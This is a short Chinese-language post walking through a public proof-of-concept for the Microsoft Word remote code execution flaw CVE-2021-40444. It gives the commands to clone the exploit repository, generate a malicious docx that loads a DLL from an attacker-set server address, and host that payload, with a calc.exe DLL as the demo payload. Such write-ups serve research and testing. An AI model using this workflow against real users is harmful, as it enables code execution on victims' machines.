漏洞利用:如何利用Office Word远程代码执行漏洞CVE-2021-40444

2021-10-11 16:02:07 浏览数 (1)

技术介绍

在本文中,我们将给大家提供一个针对微软Office Word远程代码执行漏洞CVE-2021-40444的PoC。这个PoC中,我们会使用一个恶意docx生成器,并成功利用CVE-2021-40444,即微软Office Word远程代码执行漏洞。

这个PoC脚本主要基于研究人员针对在野样本的逆向工程分析结果而创建,参考的docx文件样本为:

代码语言:javascript复制
938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52

漏洞利用前提

首先,我们需要安装好lcab:

代码语言:javascript复制
sudo apt-get install lcab

如果生成的cab无法使用的话,请尝试将exploit.html URL指向calc.cab。

漏洞利用

首先,我们需要使用下列命令将漏洞利用PoC代码包下载至本地:

代码语言:javascript复制
git clone https://github.com/lockedbyte/CVE-2021-40444.git

接下来,我们需要根据给定的DLL生成一份恶意docx文档,此时可以使用PoC项目目录中的“test/calc.dll”文件,该DLL将会通过调用system()来执行calc.exe:

代码语言:javascript复制
python3 exploit.py generate test/calc.dll http://<SRV IP>

拿到了生成好的恶意docx文档(存储在out/目录中)之后,我们就可以配置并启动服务器了:

代码语言:javascript复制
sudo python3 exploit.py host 80

最后,我们可以在一台Windows虚拟机中测试PoC和生成的恶意docx文档:

PoC项目库

PoC:

https://github.com/lockedbyte/CVE-2021-40444

0 人点赞